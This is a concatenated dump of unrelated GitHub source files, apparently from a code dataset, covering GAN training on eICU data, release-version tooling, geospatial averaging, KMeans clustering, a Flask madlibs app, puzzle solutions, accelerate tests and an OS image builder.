argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom modules import RCGAN, Discriminator\nimport hparams as hp\nimport numpy as np\nimport pandas as pd\nfrom utils import *\nfrom torch.utils.data import DataLoader\nimport random\n\n\ndef validate(model, discriminator, val_loader, writer, iteration):\n model.eval()\n discriminator.eval()\n with torch.no_grad():\n n_data, val_loss_d, val_loss_g = 0, 0, 0\n for i, batch in enumerate(val_loader):\n targets, target_labels = [ x.cuda(non_blocking=True) for x in batch ]\n n_data += len(targets)\n preds = model(target_labels)\n \n y, y_hat = discriminator(targets, preds.detach(), target_labels)\n loss_d = ((1-y)**2 + y_hat**2).mean()\n \n _, y_hat = discriminator(targets, preds, target_labels)\n loss_g = ((1-y_hat)**2).mean()\n\n val_loss_d += loss_d.item() * len(targets)\n val_loss_g += loss_g.item() * len(targets)\n\n val_loss_d /= n_data\n val_loss_g /= n_data\n \n model.train()\n discriminator.train()\n \n val_loss_mmd = MMD(preds, targets).item()\n writer.add_scalar('losses_val/loss_mmd', val_loss_mmd, global_step=iteration)\n writer.add_scalar('losses_val/loss_d', val_loss_d, global_step=iteration)\n writer.add_scalar('losses_val/loss_g', val_loss_g, global_step=iteration)\n \n idx = random.randrange(len(targets))\n for i in range(hp.orig_dim):\n fig = plot_image(preds[idx, :, i].detach().cpu(), targets[idx, :, i].detach().cpu())\n writer.add_figure(f'plots_{i}/val', fig, global_step=iteration)\n\n\ndef main(hp, args):\n pid_list = os.listdir(\"./Dataset/physionet.org/files/eicu-crd/2.0/preprocessed/sequences\")\n random.seed(1234)\n random.shuffle(pid_list)\n train_pid = pid_list[:int(0.8*len(pid_list))]\n val_pid = pid_list[int(0.8*len(pid_list)):int(0.9*len(pid_list))]\n test_pid = pid_list[int(0.9*len(pid_list)):]\n \n seq_list = []\n for pid in train_pid:\n seq = np.load(f\"./Dataset/physionet.org/files/eicu-crd/2.0/preprocessed/sequences/{pid}\")\n seq_list.append(seq)\n mu, std = np.concatenate(seq_list, axis=0).mean(axis=0), np.concatenate(seq_list, axis=0).std(axis=0)\n \n train_dataset = eICUDataset(train_pid, mu, std, seq_list=seq_list)\n val_dataset = eICUDataset(val_pid, mu, std)\n test_dataset = eICUDataset(test_pid, mu, std)\n\n train_loader = DataLoader(train_dataset, shuffle=True, batch_size=hp.batch_size, drop_last=True)\n val_loader = DataLoader(val_dataset, batch_size=hp.batch_size)\n test_loader = DataLoader(test_dataset, batch_size=hp.batch_size)\n \n model = RCGAN(hp).cuda()\n discriminator = Discriminator(hp, conditional=True).cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=hp.learning_rate)\n optim_d = torch.optim.Adam(discriminator.parameters(), lr=hp.learning_rate, betas=[0.5, 0.9])\n writer = get_writer(hp.output_directory, args.logdir)\n\n iteration = 0\n model.train()\n discriminator.train()\n for epoch in range(1, hp.epochs+1, 1):\n for i, batch in enumerate(train_loader):\n targets, target_labels = [ x.cuda(non_blocking=True) for x in batch ]\n preds = model(target_labels)\n \n ####### Discriminator #######\n y, y_hat = discriminator(targets, preds.detach(), target_labels)\n loss_d = ((1-y)**2 + y_hat**2).mean()\n optim_d.zero_grad(set_to_none=True)\n loss_d.backward()\n optim_d.step()\n \n ####### Model #######\n _, y_hat = discriminator(targets, preds, target_labels)\n loss_g = ((1-y_hat)**2).mean()\n optimizer.zero_grad(set_to_none=True)\n loss_g.backward()\n optimizer.step()\n \n ####### Logging #######\n writer.add_scalar('losses_train/loss_d', loss_d.item(), global_step=iteration)\n writer.add_scalar('losses_train/loss_g', loss_g.item(), global_step=iteration)\n\n iteration += 1\n \n if iteration%hp.iters_per_checkpoint==0:\n save_checkpoint(model, optimizer, hp.learning_rate, iteration,\n f'{hp.output_directory}/{args.logdir}/RCGAN_checkpoint_{iteration}.pt')\n save_checkpoint(discriminator, optim_d, hp.learning_rate, iteration,\n f'{hp.output_directory}/{args.logdir}/Disc_checkpoint_{iteration}.pt')\n \n loss_mmd = MMD(preds, targets)\n writer.add_scalar('losses_train/loss_mmd', loss_mmd.item(), global_step=iteration) \n \n idx = random.randrange(len(targets))\n for i in range(hp.orig_dim):\n fig = plot_image(preds[idx, :, i].detach().cpu(), targets[idx, :, i].detach().cpu())\n writer.add_figure(f'plots_{i}/train', fig, global_step=iteration)\n \n validate(model, discriminator, val_loader, writer, iteration)\n\nif __name__ == '__main__':\n p = argparse.ArgumentParser()\n p.add_argument('--gpu', type=str, default='0')\n p.add_argument('--seed', type=int, default=0)\n p.add_argument('--logdir', type=str, required=True)\n args = p.parse_args()\n \n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n torch.set_printoptions(precision=2, sci_mode=False)\n\n main(hp, args)\n","repo_name":"jiwoohong93/ai_dep","sub_path":"medical/medical_4/train_gan.py","file_name":"train_gan.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"17826825591","text":"import argparse\nimport re\nfrom typing import Tuple\n\nfrom setup import find_version\n\n\ndef get_next_version(release_type) -> Tuple[Tuple[int, int, int], str, str]:\n current_ver = find_version(\"fairscale/version.py\")\n version_list = [int(x) for x in current_ver.strip(\"'\").split(\".\")]\n major, minor, patch = version_list[0], version_list[1], version_list[2]\n if release_type == \"patch\":\n patch += 1\n elif release_type == \"minor\":\n minor += 1\n patch = 0\n elif release_type == \"major\":\n major += 1\n minor = patch = 0\n else:\n raise ValueError(\"Incorrect release type specified. Acceptable types are major, minor and patch.\")\n\n new_version_tuple = (major, minor, patch)\n new_version_str = \".\".join([str(x) for x in new_version_tuple])\n new_tag_str = \"v\" + new_version_str\n return new_version_tuple, new_version_str, new_tag_str\n\n\ndef update_version(new_version_tuple) -> None:\n \"\"\"\n given the current version, update the version to the\n next version depending on the type of release.\n \"\"\"\n\n with open(\"fairscale/version.py\", \"r\") as reader:\n current_version_data = reader.read()\n\n # for line in current_version_data:\n version_match = re.search(r\"^__version_tuple__ \", current_version_data)\n\n if version_match:\n new_version_data = \"__version_tuple__ = %s\\n\" % str(new_version_tuple)\n current_version_data = current_version_data.replace(version_match.string, new_version_data)\n\n with open(\"fairscale/version.py\", \"w\") as writer:\n writer.write(current_version_data)\n else:\n raise RuntimeError(\"__version_tuple__ not found in version.py\")\n\n\ndef main(args):\n if args.release_type in [\"major\", \"minor\", \"patch\"]:\n new_version_tuple, new_version, new_tag = get_next_version(args.release_type)\n else:\n raise ValueError(\"Incorrect release type specified\")\n\n if args.update_version:\n update_version(new_version_tuple)\n\n print(new_version, new_tag)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Versioning utils\")\n parser.add_argument(\"--release-type\", type=str, required=True, help=\"type of release = major/minor/patch\")\n parser.add_argument(\n \"--update-version\", action=\"store_true\", required=False, help=\"updates the version in fairscale/version.py\"\n )\n\n args = parser.parse_args()\n main(args)\n","repo_name":"facebookresearch/fairscale","sub_path":"release_utils.py","file_name":"release_utils.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":2639,"dataset":"github-code","pt":"72"} +{"seq_id":"15368359174","text":"# Average connections for all PLDs within one simulation\n# Refer to notes for justification of approach\n\n\nimport os\nimport pandas as pd\nimport geopandas as gp\n\n# input\nshp_folder = r'C:\\Users\\jcristia\\Documents\\GIS\\MSc_Projects\\Hakai\\scripts_runs_cluster\\seagrass\\seagrass_20200327_SS201408\\shp_merged'\nfile = 'connectivity_pld{}.shp'\nplds = ['01', '03', '07', '21', '60']\nshp_out = 'connectivity_average.shp'\n\n# read in shapefiles within folder as a geopanadas dataframe (gdf) and append to overall gdf\ngdf_all = gp.GeoDataFrame()\nfor p in plds:\n gdf = gp.read_file(os.path.join(shp_folder, file.format(p)))\n gdf['pld'] = int(p)\n gdf_all = gdf_all.append(gdf)\ngdf_all = gdf_all.astype({'from_id':int, 'to_id':int}) # there's still a mix of datatypes in the columns for some reason. This was super important to do or else the code below didn't recognize duplicates.\n\n# groupby\n# on aggregation, use a custom function\ndef mean_cust_denom(x):\n s = x.sum()\n m = s/float(len(plds))\n return m\ngdf_group = gdf_all.groupby(['from_id', 'to_id']).agg(\n prob_avg = ('prob', mean_cust_denom),\n #time_int = ('time_int', 'first'), # I'm taking this out to avoid confusion since it was calculated incorrectly in the biology script.\n totalori = ('totalori', 'first'),\n date_start = ('date_start', 'first'),\n geometry = ('geometry', 'first'),\n pld = ('pld', 'min') # take the minimum PLD\n )\ngdf_group = gdf_group.astype({'totalori':int})\ngdf_group = gdf_group.reset_index()\n\n# output\ngdf_f = gp.GeoDataFrame(gdf_group, crs=gdf.crs)\ngdf_f.to_file(filename=os.path.join(shp_folder, shp_out), driver='ESRI Shapefile')","repo_name":"jcristia/connectivity_hakai","sub_path":"scripts_dev_scratch/network_analysis/02_average_connectivity.py","file_name":"02_average_connectivity.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12598775705","text":"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nimport seaborn as sns; sns.set()\nimport csv\nimport sys\nimport os\n\n\narch_inicial= sys.argv[1]\narch_final= sys.argv[2]\narch_final_centroide= sys.argv[4]\ncluster=sys.argv[3]\n\n#print ('C:/laragon/www/siams/storage/kmeans/' + arch_inicial)\ndf = pd.read_csv(arch_inicial)\n\ndf.dropna(axis=0,how='any',subset=['latitud','longitud'],inplace=True)\nX=df.loc[:,['id','latitud','longitud']]\n\nkmeans = KMeans(n_clusters = int(cluster), init ='k-means++')\nkmeans.fit(X[X.columns[1:3]]) # Compute k-means clustering.\nX['cluster_label'] = kmeans.fit_predict(X[X.columns[1:3]])\ncenters = kmeans.cluster_centers_ # Coordinates of cluster centers.\nlabels = kmeans.predict(X[X.columns[1:3]]) # Labels of each point\n\nX.plot.scatter(x = 'latitud', y = 'longitud', c=labels, s=50, cmap='viridis')\nplt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5)\nprint(\"antes\")\ndf = pd.DataFrame(X)\ndf.to_csv(arch_final)\n\nY= kmeans.cluster_centers_\ndf = pd.DataFrame(Y)\ndf.to_csv(arch_final_centroide)\n\nprint(\"medio\")\nstrFile = \"/var/www/siams/public/img/kmeans/poo.png\"\nif os.path.isfile(strFile):\n os.remove(strFile) # Opt.: os.system(\"rm \"+strFile)\nplt.savefig('/var/www/siams/public/img/kmeans/poo.png')\nos.chmod(\"/var/www/siams/public/img/kmeans/poo.png\", 777)\nprint (\"final\")","repo_name":"XavierJuradoM/SIAMS","sub_path":"storage/kmeans/algoritmo.py","file_name":"algoritmo.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26040702925","text":"from flask import Flask, request, render_template\r\n\r\n# from flask_debugtoolbar import DebugToolbarExtension\r\n\r\napp = Flask(__name__)\r\n# app.config[\"SECRET_KEY\"] = \"somethingRandom\"\r\n\r\n# debug = DebugToolbarExtension(app)\r\n\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n \"\"\"Return homepage.\"\"\"\r\n return render_template(\"base.html\")\r\n\r\n\r\n@app.route(\"/story\")\r\ndef get_story():\r\n place = request.args[\"place\"]\r\n noun = request.args[\"noun\"]\r\n verb = request.args[\"verb\"]\r\n adjective = request.args[\"adjective\"]\r\n plural_noun = request.args[\"plural_noun\"]\r\n return render_template(\r\n \"story.html\",\r\n place=place,\r\n noun=noun,\r\n verb=verb,\r\n adjective=adjective,\r\n plural_noun=plural_noun,\r\n )\r\n","repo_name":"CyberMermaid/Jinja-Exercise","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"398848299","text":"points = [(6,10), (0,14), (9,10), (0,3), (10,4), (4,11), (6,0), (6,12), (4,1), (0,13), (10,12), (3,4), (3,0), (8,4), (1,10), (2,14), (8,10), (9,0),]\nfolds = [(1,7), (0,5),]\n\nfor j,(d,f) in enumerate(folds):\n\tfor i,p in enumerate(points):\n\t\tif p[d] > f:\n\t\t\tp = list(p)\n\t\t\tp[d] = f - (p[d] - f)\n\t\t\tpoints[i] = tuple(p)\n\tif j == 0:\n\t\tprint(len(set(points)))\n\npoints = set(points)\nxmin = min(p[0] for p in points)\nxmax = max(p[0] for p in points)\nymin = min(p[1] for p in points)\nymax = max(p[1] for p in points)\nfor y in range(ymin,ymax+1):\n\tfor x in range(xmin,xmax+1):\n\t\tif (x,y) in points:\n\t\t\tprint('#',end='')\n\t\telse:\n\t\t\tprint(' ',end='')\n\tprint()\n","repo_name":"mrphlip/aoc","sub_path":"2021/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"9441657115","text":"# Import libraries\r\nimport time\r\nfrom datetime import datetime\r\nfrom urllib.request import urlopen as uReq\r\nfrom bs4 import BeautifulSoup as soup\r\n\r\n#Makes loop infinite\r\nwhile True:\r\n\r\n # Set the URL you want to webscrape from\r\n url = 'https://pomber.github.io/covid19/timeseries.json'\r\n \r\n # Connect to the URL\r\n uClient = uReq(url)\r\n page_html = uClient.read()\r\n uClient.close()\r\n \r\n #set html parsing\r\n page_soup = soup(page_html,\"html.parser\")\r\n \r\n #opens .txt file for temp data storage\r\n file = open(\"datastorage.txt\",\"w\")\r\n \r\n #clears contents of file\r\n file.truncate()\r\n \r\n #writes data to .txt file\r\n file.write(str(page_soup))\r\n\r\n #closes file\r\n file.close()\r\n\r\n #for debugging\r\n now = datetime.now()\r\n print(\"File read at:\",now)\r\n \r\n #delays data capture by 1 hour\r\n time.sleep(3600)\r\n \r\n","repo_name":"n1khil69/corona","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71830752233","text":"import what3words\nfrom os import environ\n\ngeocoder = what3words.Geocoder(\"339SOHLH\") \n# what3words-api-key\n\nautosuggest = geocoder.autosuggest('brilliant.convince.catch', \\\n clip_to_country=\"UG\", \\\n focus=what3words.Coordinates(-0.617737, 30.656135), \\\n n_results=1, \\\n)\n# 48.856618, 2.3522411 ... focus\nif 'error' in autosuggest: # An error has been returned from the API\n code = autosuggest['error']['code']\n message = autosuggest['error']['message']\n\n print (code, message)\nelse:\n # Obtains the one, and only result from the returned list of suggestions\n words = autosuggest['suggestions'][0]['words']\n print(\"Top 3 word address match: {}\".format(words))\n\n # Use the `convert_to_coordinates` API to convert the returned 3 word address into coordinates\n convert_to_coordinates = geocoder.convert_to_coordinates(words)\n\n print(\"WGS84 Coordinates: {}, {}\".format( \\\n convert_to_coordinates['coordinates']['lat'], \\\n convert_to_coordinates['coordinates']['lng']))\n print(\"Nearest Place: {}\".format(convert_to_coordinates['nearestPlace']))","repo_name":"HerbertInk/degreesMinSec","sub_path":"justthe#/degreesMinSec/threeWords.py","file_name":"threeWords.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16235297939","text":"import json\nimport os\nimport tempfile\nfrom unittest.mock import patch\n\nimport torch\nfrom torch.utils.data import DataLoader, TensorDataset\n\nfrom accelerate.accelerator import Accelerator\nfrom accelerate.state import PartialState\nfrom accelerate.test_utils.testing import AccelerateTestCase, require_cuda\nfrom accelerate.utils import patch_environment\n\n\ndef create_components():\n model = torch.nn.Linear(2, 4)\n optimizer = torch.optim.AdamW(model.parameters(), lr=1.0)\n scheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer, max_lr=0.01, steps_per_epoch=2, epochs=1)\n train_dl = DataLoader(TensorDataset(torch.tensor([1, 2, 3])))\n valid_dl = DataLoader(TensorDataset(torch.tensor([4, 5, 6])))\n\n return model, optimizer, scheduler, train_dl, valid_dl\n\n\ndef get_signature(model):\n return (model.weight.abs().sum() + model.bias.abs().sum()).item()\n\n\ndef load_random_weights(model):\n state = torch.nn.Linear(*tuple(model.weight.T.shape)).state_dict()\n model.load_state_dict(state)\n\n\nclass AcceleratorTester(AccelerateTestCase):\n @require_cuda\n def test_accelerator_can_be_reinstantiated(self):\n _ = Accelerator()\n assert PartialState._shared_state[\"_cpu\"] is False\n assert PartialState._shared_state[\"device\"].type == \"cuda\"\n with self.assertRaises(AssertionError):\n _ = Accelerator(cpu=True)\n\n def test_prepared_objects_are_referenced(self):\n accelerator = Accelerator()\n model, optimizer, scheduler, train_dl, valid_dl = create_components()\n\n (\n prepared_model,\n prepared_optimizer,\n prepared_scheduler,\n prepared_train_dl,\n prepared_valid_dl,\n ) = accelerator.prepare(model, optimizer, scheduler, train_dl, valid_dl)\n\n self.assertTrue(prepared_model in accelerator._models)\n self.assertTrue(prepared_optimizer in accelerator._optimizers)\n self.assertTrue(prepared_scheduler in accelerator._schedulers)\n self.assertTrue(prepared_train_dl in accelerator._dataloaders)\n self.assertTrue(prepared_valid_dl in accelerator._dataloaders)\n\n def test_free_memory_dereferences_prepared_components(self):\n accelerator = Accelerator()\n model, optimizer, scheduler, train_dl, valid_dl = create_components()\n accelerator.prepare(model, optimizer, scheduler, train_dl, valid_dl)\n accelerator.free_memory()\n\n self.assertTrue(len(accelerator._models) == 0)\n self.assertTrue(len(accelerator._optimizers) == 0)\n self.assertTrue(len(accelerator._schedulers) == 0)\n self.assertTrue(len(accelerator._dataloaders) == 0)\n\n def test_env_var_device(self):\n \"\"\"Tests that setting the torch device with ACCELERATE_TORCH_DEVICE overrides default device.\"\"\"\n PartialState._reset_state()\n\n # Mock torch.cuda.set_device to avoid an exception as the device doesn't exist\n def noop(*args, **kwargs):\n pass\n\n with patch(\"torch.cuda.set_device\", noop), patch_environment(ACCELERATE_TORCH_DEVICE=\"cuda:64\"):\n accelerator = Accelerator()\n self.assertEqual(str(accelerator.state.device), \"cuda:64\")\n\n def test_save_load_model(self):\n accelerator = Accelerator()\n model, optimizer, scheduler, train_dl, valid_dl = create_components()\n accelerator.prepare(model, optimizer, scheduler, train_dl, valid_dl)\n\n model_signature = get_signature(model)\n\n with tempfile.TemporaryDirectory() as tmpdirname:\n accelerator.save_state(tmpdirname)\n\n # make sure random weights don't match\n load_random_weights(model)\n self.assertTrue(abs(model_signature - get_signature(model)) > 1e-3)\n\n # make sure loaded weights match\n accelerator.load_state(tmpdirname)\n self.assertTrue(abs(model_signature - get_signature(model)) < 1e-3)\n\n def test_save_load_model_with_hooks(self):\n accelerator = Accelerator()\n model, optimizer, scheduler, train_dl, valid_dl = create_components()\n accelerator.prepare(model, optimizer, scheduler, train_dl, valid_dl)\n\n model_signature = get_signature(model)\n\n # saving hook\n def save_config(models, weights, output_dir):\n config = {\"class_name\": models[0].__class__.__name__}\n\n with open(os.path.join(output_dir, \"data.json\"), \"w\") as f:\n json.dump(config, f)\n\n # loading hook\n def load_config(models, input_dir):\n with open(os.path.join(input_dir, \"data.json\"), \"r\") as f:\n config = json.load(f)\n\n models[0].class_name = config[\"class_name\"]\n\n save_hook = accelerator.register_save_state_pre_hook(save_config)\n load_hook = accelerator.register_load_state_pre_hook(load_config)\n\n with tempfile.TemporaryDirectory() as tmpdirname:\n accelerator.save_state(tmpdirname)\n\n # make sure random weights don't match with hooks\n load_random_weights(model)\n self.assertTrue(abs(model_signature - get_signature(model)) > 1e-3)\n\n # random class name to verify correct one is loaded\n model.class_name = \"random\"\n\n # make sure loaded weights match with hooks\n accelerator.load_state(tmpdirname)\n self.assertTrue(abs(model_signature - get_signature(model)) < 1e-3)\n\n # mode.class_name is loaded from config\n self.assertTrue(model.class_name == model.__class__.__name__)\n\n # remove hooks\n save_hook.remove()\n load_hook.remove()\n\n with tempfile.TemporaryDirectory() as tmpdirname:\n accelerator.save_state(tmpdirname)\n\n # make sure random weights don't match with hooks removed\n load_random_weights(model)\n self.assertTrue(abs(model_signature - get_signature(model)) > 1e-3)\n\n # random class name to verify correct one is loaded\n model.class_name = \"random\"\n\n # make sure loaded weights match with hooks removed\n accelerator.load_state(tmpdirname)\n self.assertTrue(abs(model_signature - get_signature(model)) < 1e-3)\n\n # mode.class_name is NOT loaded from config\n self.assertTrue(model.class_name != model.__class__.__name__)\n","repo_name":"meanna/dreambooth","sub_path":"accelerate/tests/test_accelerator.py","file_name":"test_accelerator.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9805705668","text":"from olimage.core.io import Console\nfrom olimage.core.setup import Setup\nfrom olimage.core.utils import Utils\n\nfrom olimage.filesystem.decorators import export, prepare, stamp\nfrom olimage.filesystem.base import FileSystemBase\n\n\nclass VariantBase(FileSystemBase):\n stages = ['configure', 'cleanup']\n variant = 'base'\n\n @stamp\n @export\n @prepare\n def configure(self):\n\n # Copy resolv.conf\n with Console(\"Copying /etc/resolv.conf\"):\n Utils.shell.run('rm -vf {}/etc/resolv.conf'.format(self._build_dir), ignore_fail=True)\n Utils.shell.run('cp -vf /etc/resolv.conf {}/etc/resolv.conf'.format(self._build_dir))\n\n # Install packages\n self._install_packages()\n\n # Configure blueman\n with Console(\"Configuring blueman\"):\n Setup.blueman()\n\n # Enabling auto-login\n with Console(\"Enabling auto-login\"):\n Utils.install('/etc/lightdm/lightdm.conf')\n\n # Set default displaymanager\n with Console(\"Setting default display-manager\"):\n Setup.displaymanager(\"lightdm\")\n\n # post-install\n with Console(\"Post-install tasks\"):\n Utils.shell.chroot(\"/bin/bash -c 'echo -en > /etc/modules-load.d/cups-filters.conf'\", ignore_fail=True)\n\n # meh broken light-locker in focal\n Utils.shell.chroot('apt-get -y --purge remove light-locker', log_error=False)\n\n # xfce panel defaults\n Utils.install('/etc/X11/Xsession.d/99olimex')\n\n # set xfce background\n Utils.shell.run('dpkg-divert --rename --add --divert /usr/share/backgrounds/xfce/xfce-stripes.png.real /usr/share/backgrounds/xfce/xfce-stripes.png')\n Utils.shell.run('dpkg-divert --rename --add --divert /usr/share/backgrounds/xfce/xfce-blue.jpg.real /usr/share/backgrounds/xfce/xfce-blue.jpg')\n Utils.install('/usr/share/backgrounds/xfce/xfce-stripes.png')\n Utils.install('/usr/share/backgrounds/xfce/xfce-blue.jpg')\n Utils.install('/usr/share/backgrounds/xfce/xfce-red.jpg')\n\n # restore resolv.conf\n with Console(\"Restore /etc/resolv.conf\"):\n Utils.shell.run('rm -vf {}/etc/resolv.conf'.format(self._build_dir), ignore_fail=True)\n Utils.shell.run('ln -nsf ../run/resolvconf/resolv.conf {}/etc/resolv.conf'.format(self._build_dir))\n\n @stamp\n @export(final=True)\n @prepare\n def cleanup(self):\n super().cleanup()\n\n","repo_name":"OLIMEX/olimage","sub_path":"olimage/filesystem/variants/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"10781156154","text":"\"\"\"\nApproach 1: Brute Force -: Try it on Every Node\n TC: O(N^2)\n SC: O(N)\n\nApproach 2: Top Down --> Update the globalValue and return the localValue\n TC: O(N)\n SC: O(N)\n\nApproach 3: Bottom Up Approach -: therefore, will need a special return type i.e, PathDetails\n TC: O(N)\n SC: O(N)\n\n\"\"\"\nimport math\nfrom dataclasses import dataclass\nfrom typing import Any\n\n\n@dataclass\nclass TreeNode:\n val: int = None\n left: Any = None\n right: Any = None\n\nclass SolutionBruteForce:\n MIN = -math.inf\n maxPath = -math.inf\n\n def _maxPathSum(self, node: TreeNode) -> int:\n # Base Case\n if node is None:\n return 0\n return node.val + max(self._maxPathSum(node.left), self._maxPathSum(node.right))\n\n def getMaxPath(self, root: TreeNode) -> int:\n # Base Case\n if root is None:\n return 0\n\n # Find the details at this node\n LV = self._maxPathSum(root.left)\n RV = self._maxPathSum(root.right)\n\n CV = LV + RV + root.val\n\n # Explore\n LMS = self.getMaxPath(root.left)\n RMS = self.getMaxPath(root.right)\n\n return max(CV, LMS, RMS)\n\n def getMaxPathTopDown(self, root: TreeNode) -> int: # TC: O(N)\n # Base Case\n if root is None:\n return 0\n\n leftSum = max(self.getMaxPathTopDown(root.left), 0)\n rightSum = max(self.getMaxPathTopDown(root.right), 0)\n\n maxAtNode = root.val + leftSum + rightSum\n self.maxPath = max(self.maxPath, maxAtNode)\n\n return max(leftSum, rightSum) + root.val\n\n\n@dataclass\nclass PathDetails:\n msp: int = -math.inf # Max Sum Path\n rmp: int = -math.inf # Root Max Path\n\n\nclass Solution:\n def getMaxPath(self, root: TreeNode) -> PathDetails:\n rt = PathDetails()\n # Base Case\n if root is None:\n return rt\n\n # Explore\n LV = self.getMaxPath(root.left)\n RV = self.getMaxPath(root.right)\n\n if root.left is None:\n CV = root.val + RV.rmp\n elif root.right is None:\n CV = root.val + LV.rmp\n elif LV.rmp > 0 and RV.rmp > 0:\n CV = LV.rmp + RV.rmp + root.val\n else:\n CV = root.val + max(LV.rmp, RV.rmp)\n\n rt.msp = max(LV.msp, RV.msp, CV)\n rt.rmp = max(LV.rmp, RV.rmp) + root.val if max(LV.rmp, RV.rmp) > 0 else root.val\n\n return rt\n","repo_name":"sandeepyadav10011995/Data-Structures","sub_path":"IT Bodhi/Binary Tree/DFS/13. Max Path For Any Two Nodes.py","file_name":"13. Max Path For Any Two Nodes.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69959509353","text":"import sys\r\ninput = sys.stdin.readline\r\nR, C, T = map(int, input().split()) # 세로 # 가로\r\nA = [list(map(int, input().split())) for _ in range(R)]\r\n\r\ndx = [0,1,0,-1]\r\ndy = [1,0,-1,0]\r\n\r\nfor t in range(T): # 초마다 순회\r\n\r\n # 미세먼지 확산\r\n dust = []\r\n for r in range(R): # 미세먼지가 있는 모든 칸 구하기\r\n for c in range(C):\r\n if A[r][c] > 0:\r\n dust.append([r, c])\r\n\r\n # 미세먼지 있는 칸만 확산\r\n for d in dust:\r\n spread = 0\r\n x = d[0]\r\n y = d[1]\r\n for i in range(4): # 인접한 네 방향으로 확산 \r\n nx = x + dx[i] \r\n ny = y + dy[i] \r\n if 0 <= nx < R and 0 <= ny < C: # 칸이 있고 \r\n if A[nx][ny] != -1: # 공기청정기 아니면 \r\n d.append([nx,ny]) # 확산 \r\n d.append(A[x][y] // 5) # 확산 \r\n spread += 1 \r\n d.append(spread)\r\n A[x][y] -= (A[x][y] // 5) * spread # Ar,c - (Ar,c/5)×(확산된 방향의 개수)\r\n\r\n # print(dust) # dust[0] = [0, 7, [1, 7], 1, [0, 6], 1, 2]\r\n for d in dust:\r\n for n in range(d[-1]):\r\n xx = d[(n + 1) * 2][0]\r\n yy = d[(n + 1) * 2][1]\r\n A[xx][yy] += d[((n + 1) * 2) + 1]\r\n # pprint(A) # 확산 완료\r\n\r\n # 공기청정기 작동\r\n # 공기청정기 A[2:R-1][0] == -1\r\n clean = []\r\n for a in range(2, R-1):\r\n if A[a][0] == -1:\r\n clean.append(a)\r\n\r\n # 위쪽 반시계 방향 이동\r\n up01 = A[clean[0]][1:C-1]\r\n up01.insert(0,0) # [0, 2, 1, 1, 0, 4, 6] \r\n\r\n up02 = [] # [6, 5]\r\n for u in range(1, clean[0]+1):\r\n up02.append(A[u][-1])\r\n\r\n up03 = A[0][1:C] # [0, 0, 0, 0, 0, 1, 8]\r\n\r\n up04 = [] # [0]\r\n for u in range(clean[0]-1):\r\n up04.append(A[u][0])\r\n\r\n A[clean[0]][1:C] = up01 # A[2][1:8]\r\n\r\n for u in range(clean[0]): #A[0:clean[0]]\r\n A[u][-1] = up02[u]\r\n\r\n A[0][0:C-1] = up03 # A[0][0:7]\r\n\r\n for u in range(clean[0]-1): # A[1:clean[0]]\r\n A[u+1][0] = up04[u]\r\n\r\n\r\n # 아래쪽 시계 방향 이동\r\n down01 = A[clean[1]][1:C-1]\r\n down01.insert(0,0) # [0, 5, 2, 0, 0, 2, 12]\r\n\r\n down02 = [] # [0, 8, 0]\r\n for u in range(clean[1], R-1):\r\n down02.append(A[u][-1])\r\n\r\n down03 = A[-1][1:C] # [8, 17, 8, 3, 4, 8, 4]\r\n\r\n down04 = [] # [0, 0]\r\n for u in range(clean[1]+2, R):\r\n down04.append(A[u][0])\r\n\r\n A[clean[1]][1:C] = down01 # A[3][1:8]\r\n\r\n for u in range(clean[1]+1, R): # A[4:7][-1]\r\n A[u][-1] = down02[u-(clean[1]+1)]\r\n\r\n A[-1][0:C-1] = down03 # A[-1][0:7]\r\n\r\n for u in range(clean[1]+1, R-1): # A[4:6][0]\r\n A[u][0] = down04[u-(clean[1]+1)]\r\n\r\nsum = 0\r\nfor du in range(R):\r\n for st in range(C):\r\n if A[du][st] > 0:\r\n sum += A[du][st]\r\n\r\nprint(sum) # 순회가 끝난 뒤 남은 미세먼지 합","repo_name":"kanghaeven/Algorithm","sub_path":"백준/Gold/17144. 미세먼지 안녕!/미세먼지 안녕!.py","file_name":"미세먼지 안녕!.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30756463822","text":"from calendar import Calendar\nfrom datetime import date\nimport calendar\n\n# subclassing the built-in ValueError to create MeetupDayException\nclass MeetupDayException(ValueError):\n \"\"\"Exception raised when the Meetup weekday and count do not result in a valid date.\n\n message: 